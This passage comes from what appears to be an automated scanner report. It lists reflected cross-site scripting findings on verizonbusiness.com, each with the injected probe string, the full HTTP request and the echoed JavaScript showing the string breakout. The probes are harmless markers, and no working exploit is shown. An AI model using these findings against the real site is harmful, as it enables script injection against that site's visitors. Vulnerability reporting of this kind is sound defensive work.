hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.512. http://www.verizonbusiness.com/in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /in/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8564'%3bbba59984b8c was submitted in the REST URL parameter 1. This input was echoed as e8564';bba59984b8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ine8564'%3bbba59984b8c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ine8564';bba59984b8c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.513. http://www.verizonbusiness.com/it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11d0f"%3b009bb24b747 was submitted in the REST URL parameter 1. This input was echoed as 11d0f";009bb24b747 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it11d0f"%3b009bb24b747/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:29 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it11d0f";009bb24b747/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.514. http://www.verizonbusiness.com/it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f777d'%3b3018be4fc24 was submitted in the REST URL parameter 1. This input was echoed as f777d';3018be4fc24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /itf777d'%3b3018be4fc24/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/itf777d';3018be4fc24/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.515. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8690f"%3b014bb77b145 was submitted in the REST URL parameter 1. This input was echoed as 8690f";014bb77b145 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it8690f"%3b014bb77b145/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it8690f";014bb77b145/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.516. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f10a2'%3b78aa0945588 was submitted in the REST URL parameter 1. This input was echoed as f10a2';78aa0945588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /itf10a2'%3b78aa0945588/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40643
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/itf10a2';78aa0945588/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.517. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c0e3"%3b087dbbe08c2 was submitted in the REST URL parameter 2. This input was echoed as 5c0e3";087dbbe08c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions5c0e3"%3b087dbbe08c2/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41138
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it/solutions5c0e3";087dbbe08c2/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.518. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f4fd'%3bd5e281ab627 was submitted in the REST URL parameter 2. This input was echoed as 2f4fd';d5e281ab627 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions2f4fd'%3bd5e281ab627/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41138
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/it/solutions2f4fd';d5e281ab627/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.519. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6735d"%3bbd8ba6c2fd5 was submitted in the REST URL parameter 3. This input was echoed as 6735d";bd8ba6c2fd5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions/var6735d"%3bbd8ba6c2fd5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42350
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it/solutions/var6735d";bd8ba6c2fd5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.520. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb99'%3b8e85f015c3d was submitted in the REST URL parameter 3. This input was echoed as acb99';8e85f015c3d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions/varacb99'%3b8e85f015c3d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:54 GMT
Content-Type: text/html
Content-Length: 42350
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/it/solutions/varacb99';8e85f015c3d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.521. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /jp/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3bbe"%3b5e4e2109d00 was submitted in the REST URL parameter 1. This input was echoed as d3bbe";5e4e2109d00 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jpd3bbe"%3b5e4e2109d00/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:19 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 48637
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn=".................................";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/jpd3bbe";5e4e2109d00/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.522. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /jp/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17cec'%3bbf9b3c29f39 was submitted in the REST URL parameter 1. This input was echoed as 17cec';bf9b3c29f39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jp17cec'%3bbf9b3c29f39/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:54 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 48637
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/jp17cec';bf9b3c29f39/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.523. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /kr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87230"%3b8e18eede772 was submitted in the REST URL parameter 1. This input was echoed as 87230";8e18eede772 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kr87230"%3b8e18eede772/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/kr87230";8e18eede772/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.524. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /kr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1b4e'%3b9b709c792ca was submitted in the REST URL parameter 1. This input was echoed as a1b4e';9b709c792ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kra1b4e'%3b9b709c792ca/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/kra1b4e';9b709c792ca/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.525. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /mx/

Issue detail

